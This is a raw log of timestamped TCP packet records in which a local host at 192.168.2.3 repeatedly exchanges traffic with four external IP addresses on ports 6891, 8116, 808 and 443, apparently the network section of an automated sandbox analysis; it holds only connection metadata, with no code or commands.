Oct 28, 2021 05:27:34.309731007 CEST	49921	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.312711000 CEST	49921	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.312799931 CEST	49921	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.429549932 CEST	6891	49919	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.429582119 CEST	6891	49919	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.429600000 CEST	6891	49919	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.478724957 CEST	6891	49921	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.478754044 CEST	6891	49921	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.515202999 CEST	6891	49921	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.823461056 CEST	6891	49919	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.823483944 CEST	6891	49919	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.823560953 CEST	49919	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.823596954 CEST	49919	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.832326889 CEST	49919	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.856242895 CEST	6891	49921	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.856281996 CEST	6891	49921	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:34.856389046 CEST	49921	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.857151985 CEST	49921	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.860014915 CEST	49921	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:34.965178013 CEST	49928	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:34.992535114 CEST	49929	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:34.998239040 CEST	6891	49919	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:35.023752928 CEST	8116	49928	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.023870945 CEST	49928	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.024661064 CEST	49928	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.025870085 CEST	6891	49921	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:35.046840906 CEST	8116	49929	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.046977043 CEST	49929	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.049478054 CEST	49929	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.082786083 CEST	8116	49928	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.083055019 CEST	8116	49928	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.083133936 CEST	49928	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.086052895 CEST	49928	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.090097904 CEST	49928	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.090240955 CEST	49928	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.103645086 CEST	8116	49929	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.103832006 CEST	8116	49929	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.103915930 CEST	49929	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.104538918 CEST	49929	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.108205080 CEST	49929	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.108350039 CEST	49929	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.148426056 CEST	8116	49928	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.148458958 CEST	8116	49928	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.149142981 CEST	8116	49928	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.162389994 CEST	8116	49929	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.162420034 CEST	8116	49929	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.163157940 CEST	8116	49929	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.321383953 CEST	8116	49928	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.321413040 CEST	8116	49928	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.321573019 CEST	49928	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.321592093 CEST	49928	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.330595016 CEST	49928	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.337109089 CEST	8116	49929	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.337136984 CEST	8116	49929	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.337235928 CEST	49929	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.340035915 CEST	49929	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:35.388731003 CEST	8116	49928	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.394125938 CEST	8116	49929	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:35.464922905 CEST	49931	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:35.464987993 CEST	443	49931	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:35.465177059 CEST	49931	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:35.467695951 CEST	49932	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:35.467736959 CEST	443	49932	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:35.468331099 CEST	49931	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:35.468374968 CEST	443	49931	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:35.468508959 CEST	49932	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:35.470086098 CEST	49932	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:35.470097065 CEST	443	49932	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:35.968539953 CEST	443	49931	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:35.969475031 CEST	49931	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:35.971900940 CEST	49931	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:35.971920013 CEST	443	49931	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:35.976383924 CEST	443	49932	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:35.977890015 CEST	49931	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:35.977916002 CEST	443	49931	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:35.977988005 CEST	49931	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:35.977997065 CEST	443	49931	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:35.978373051 CEST	49932	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:35.979784966 CEST	49932	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:35.979794025 CEST	443	49932	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:35.985529900 CEST	49932	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:35.985543013 CEST	443	49932	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:35.985651016 CEST	49932	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:35.985658884 CEST	443	49932	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:36.664150000 CEST	443	49931	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:36.664254904 CEST	443	49931	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:36.665756941 CEST	49931	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:36.672012091 CEST	49931	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:36.672046900 CEST	443	49931	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:36.675194979 CEST	443	49932	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:36.675287962 CEST	443	49932	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:36.675432920 CEST	49932	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:36.675451994 CEST	49932	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:36.678603888 CEST	49932	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:36.678646088 CEST	443	49932	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:36.795754910 CEST	49939	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:36.958509922 CEST	808	49939	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:36.959027052 CEST	49939	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:36.960531950 CEST	49939	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.038558006 CEST	49941	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.123100996 CEST	808	49939	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.123210907 CEST	808	49939	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.123320103 CEST	49939	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.123960972 CEST	49939	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.126888037 CEST	49939	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.126970053 CEST	49939	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.208401918 CEST	808	49941	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.208633900 CEST	49941	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.209270000 CEST	49941	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.286778927 CEST	808	49939	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.289763927 CEST	808	49939	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.289783001 CEST	808	49939	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.289791107 CEST	808	49939	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.289798975 CEST	808	49939	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.378781080 CEST	808	49941	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.378953934 CEST	808	49941	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.379133940 CEST	49941	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.380156040 CEST	49941	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.384543896 CEST	49941	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.384627104 CEST	49941	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.553112030 CEST	808	49941	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.554301977 CEST	808	49941	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.554320097 CEST	808	49941	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.554330111 CEST	808	49941	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.554344893 CEST	808	49941	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.685314894 CEST	808	49939	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.685345888 CEST	808	49939	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.687167883 CEST	49939	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.693399906 CEST	49939	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.813075066 CEST	49947	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:37.856477976 CEST	808	49939	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.938011885 CEST	808	49941	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.938055992 CEST	808	49941	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:37.938186884 CEST	49941	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.938240051 CEST	49941	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.940751076 CEST	49941	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:37.979959011 CEST	6891	49947	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:37.980556011 CEST	49947	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:37.981966972 CEST	49947	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:38.084712029 CEST	49949	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:38.112148046 CEST	808	49941	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:38.148036003 CEST	6891	49947	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.148138046 CEST	6891	49947	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.151071072 CEST	49947	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:38.153899908 CEST	49947	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:38.166249037 CEST	49947	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:38.166366100 CEST	49947	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:38.251245022 CEST	6891	49949	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.251432896 CEST	49949	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:38.252051115 CEST	49949	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:38.332453966 CEST	6891	49947	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.332477093 CEST	6891	49947	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.371296883 CEST	6891	49947	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.418214083 CEST	6891	49949	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.418319941 CEST	6891	49949	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.418443918 CEST	49949	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:38.419044971 CEST	49949	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:38.421817064 CEST	49949	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:38.421925068 CEST	49949	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:38.587858915 CEST	6891	49949	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.587966919 CEST	6891	49949	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.627327919 CEST	6891	49949	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.711381912 CEST	6891	49947	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.711404085 CEST	6891	49947	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.711679935 CEST	49947	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:38.719649076 CEST	49947	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:38.835372925 CEST	49953	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:38.885817051 CEST	6891	49947	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.887619019 CEST	8116	49953	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:38.893347025 CEST	49953	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:38.894160032 CEST	49953	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:38.946192026 CEST	8116	49953	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:38.947738886 CEST	8116	49953	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:38.949990034 CEST	49953	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:38.950753927 CEST	49953	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:38.954794884 CEST	49953	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:38.954925060 CEST	49953	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:38.969721079 CEST	6891	49949	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.969744921 CEST	6891	49949	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:38.969831944 CEST	49949	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:38.973197937 CEST	49949	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:39.007487059 CEST	8116	49953	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:39.112468004 CEST	49955	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:39.139103889 CEST	6891	49949	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:39.172156096 CEST	8116	49955	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:39.172643900 CEST	49955	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:39.173676968 CEST	49955	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:39.192718983 CEST	8116	49953	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:39.192867041 CEST	8116	49953	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:39.193728924 CEST	49953	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:39.206222057 CEST	49953	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:39.233519077 CEST	8116	49955	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:39.233556986 CEST	8116	49955	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:39.233691931 CEST	49955	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:39.234477997 CEST	49955	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:39.239748001 CEST	49955	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:39.239898920 CEST	49955	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:39.259738922 CEST	8116	49953	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:39.300833941 CEST	8116	49955	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:39.300870895 CEST	8116	49955	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:39.300887108 CEST	8116	49955	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:39.331501007 CEST	49957	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:39.331552029 CEST	443	49957	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:39.331980944 CEST	49957	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:39.332489967 CEST	49957	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:39.332504034 CEST	443	49957	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:39.485456944 CEST	8116	49955	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:39.485481977 CEST	8116	49955	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:39.485574961 CEST	49955	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:39.485630989 CEST	49955	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:39.488806009 CEST	49955	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:39.547513008 CEST	8116	49955	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:39.615504026 CEST	49959	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:39.615530014 CEST	443	49959	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:39.615633011 CEST	49959	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:39.616224051 CEST	49959	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:39.616236925 CEST	443	49959	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:39.852437973 CEST	443	49957	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:39.852602959 CEST	49957	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:39.853435993 CEST	49957	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:39.853444099 CEST	443	49957	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:39.858711004 CEST	49957	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:39.858716011 CEST	443	49957	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:39.858824015 CEST	49957	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:39.858833075 CEST	443	49957	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:40.142293930 CEST	443	49959	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:40.142416000 CEST	49959	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:40.143191099 CEST	49959	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:40.143203974 CEST	443	49959	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:40.149074078 CEST	49959	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:40.149095058 CEST	443	49959	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:40.149229050 CEST	49959	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:40.149240971 CEST	443	49959	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:40.564987898 CEST	443	49957	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:40.565067053 CEST	443	49957	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:40.565223932 CEST	49957	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:40.576880932 CEST	49957	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:40.576910973 CEST	443	49957	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:40.705423117 CEST	49963	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:40.864336967 CEST	808	49963	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:40.864480972 CEST	49963	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:40.865277052 CEST	49963	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:40.865627050 CEST	443	49959	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:40.865694046 CEST	443	49959	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:40.865712881 CEST	49959	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:40.865741968 CEST	49959	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:40.868824005 CEST	49959	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:40.868837118 CEST	443	49959	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:41.024074078 CEST	808	49963	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.024221897 CEST	808	49963	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.025331020 CEST	49964	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:41.025396109 CEST	49963	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:41.026006937 CEST	49963	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:41.030019045 CEST	49963	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:41.030134916 CEST	49963	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:41.184837103 CEST	808	49963	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.186047077 CEST	808	49964	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.186172009 CEST	49964	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:41.186942101 CEST	49964	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:41.188731909 CEST	808	49963	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.188879967 CEST	808	49963	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.188898087 CEST	808	49963	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.189017057 CEST	808	49963	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.347644091 CEST	808	49964	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.347764969 CEST	808	49964	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.348021030 CEST	49964	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:41.348673105 CEST	49964	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:41.352628946 CEST	49964	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:41.352761984 CEST	49964	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:41.509377956 CEST	808	49964	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.513375998 CEST	808	49964	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.513397932 CEST	808	49964	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.513407946 CEST	808	49964	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.513422966 CEST	808	49964	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.588462114 CEST	808	49963	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.588493109 CEST	808	49963	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.588563919 CEST	49963	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:41.594008923 CEST	49963	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:41.710088968 CEST	49965	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:41.752887011 CEST	808	49963	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.876194000 CEST	6891	49965	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:41.877872944 CEST	49965	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:41.878643036 CEST	49965	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:41.903927088 CEST	808	49964	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.903960943 CEST	808	49964	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:41.904747963 CEST	49964	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:41.909790993 CEST	49964	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:42.038989067 CEST	49966	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:42.044575930 CEST	6891	49965	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:42.044758081 CEST	6891	49965	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:42.044817924 CEST	49965	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:42.045382023 CEST	49965	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:42.048243046 CEST	49965	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:42.048329115 CEST	49965	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:42.070940971 CEST	808	49964	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:42.205075026 CEST	6891	49966	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:42.206747055 CEST	49966	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:42.207333088 CEST	49966	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:42.214395046 CEST	6891	49965	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:42.215025902 CEST	6891	49965	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:42.251185894 CEST	6891	49965	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:42.373302937 CEST	6891	49966	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:42.373414040 CEST	6891	49966	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:42.373625040 CEST	49966	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:42.374491930 CEST	49966	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:42.381788969 CEST	49966	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:42.382025957 CEST	49966	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:42.547916889 CEST	6891	49966	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:42.548019886 CEST	6891	49966	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:42.593303919 CEST	6891	49965	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:42.593333960 CEST	6891	49965	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:42.593463898 CEST	49965	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:42.601598978 CEST	49965	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:42.720016003 CEST	49967	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:42.767654896 CEST	6891	49965	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:42.773312092 CEST	8116	49967	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:42.773487091 CEST	49967	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:42.774241924 CEST	49967	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:42.827322006 CEST	8116	49967	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:42.827519894 CEST	8116	49967	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:42.827620029 CEST	49967	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:42.828155994 CEST	49967	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:42.839975119 CEST	49967	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:42.851849079 CEST	49967	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:42.893213987 CEST	8116	49967	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:42.905266047 CEST	8116	49967	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:42.945178986 CEST	6891	49966	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:42.945202112 CEST	6891	49966	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:42.945391893 CEST	49966	6891	192.168.2.3	45.77.0.96
